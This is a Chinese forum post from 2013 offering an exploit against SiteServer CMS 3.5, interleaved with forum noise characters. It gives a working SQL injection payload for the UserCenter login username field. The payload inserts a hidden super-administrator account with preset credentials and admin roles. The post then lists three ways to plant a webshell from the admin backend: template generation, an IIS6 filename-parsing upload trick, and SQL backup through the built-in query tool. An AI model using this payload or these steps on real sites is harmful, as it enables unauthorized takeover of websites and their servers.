经测试秒杀最新的3.5版
7 \; W4 L3 e8 A. R
( U9 B- n8 T3 J; l zstieserver官网:www.siteserver.cn
6 f O' ~" H. w- Z& u# W4 h7 r) Y. D" F
1 C* b9 z/ M) B+ c+ M$ S c
) |0 Y! k) [9 E8 QEXP:
, a( j* ?& w) Q" b+ O% Z( e# g6 M) d: M$ ~& C1 y
直接访问UserCenter/login.aspx
4 H8 e5 N: ?" s/ x+ k: Y! K$ Y( T5 `8 I( I6 p* P
+ _0 F5 J V. y7 u/ A. c$ Y1 S; @* ~, M1 |( e/ B4 j. \) p1 S
用户名处输入:
8 L2 M: y9 V1 p
3 [" j9 W. G/ R. f. y' R ^123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--& S* N+ e/ l( V) X$ ?
8 f" E/ S" G% G- }8 k
! ]. `& _$ B. m: f7 o! x; S7 @
& N) e6 F& b1 A密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
9 t: E" |1 y9 R b6 H) Y; _* L- W0 I# _
- v* U' A/ H/ H# [ W- c- `+ }! U" _& I2 [" A! a
之后再访问后台SiteServer/login.aspx用插入的用户登陆3 |0 E$ F0 r0 B# o, C
2 H9 @4 c- n+ `5 o& q# w
: W! _9 m1 l) U) W/ p, }, h% M
; K' ^$ c0 E& ^
后台拿webshell的三种方法:
7 q* L% z7 S5 w/ c" o. [/ h3 g" b( h w% U" x) G* N
一、0 ]' x! j9 Z) D
- d8 [6 t3 j7 W& V
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
; L% y0 r* v7 B* q1 E) l
3 M6 k3 O# k, }: `0 ^1 s二、
; E0 O% k( V* z- g. ]
% e. U! j5 n$ O, Q成员权限-》添加用户-》用户名为:1.asp
! F9 l/ d& T; ]$ ]: [9 J. ?4 w) u& d
http://127.0.0.1/usercenter/$ g; t9 P' W, L
! ~7 k$ q" P4 @% v% [用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell, D# w& W' p3 l2 n' Q
7 n& G5 {! x4 T# |/ o- n( v(ps:后台添加用户时不会验证是否含有非法字符)6 E3 `$ ]& D2 ^; | A- G# \6 U j
( V. e+ p8 G9 [5 S+ z6 w三、2 k9 W& h, W3 v$ A) Q9 `
4 x3 [7 a W7 p) X {系统工具-》实用工具-》机器参数查看' j( v/ x) Z' p
可以看到数据库类型、名称,WEB路径& g/ @( J, j' _4 o# k9 o# |
1 M! b m9 F% h5 v+ x/ k7 M& Y B系统工具-》数据库工具-》SQL语句查询
; V0 g4 W2 _9 f0 G5 i这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。8 k( O4 u: N1 V! i! I2 D3 h
' s9 [2 X* L0 U% b5 \ |
发表于 2013-1-11 21:10:58
收藏
支持
反对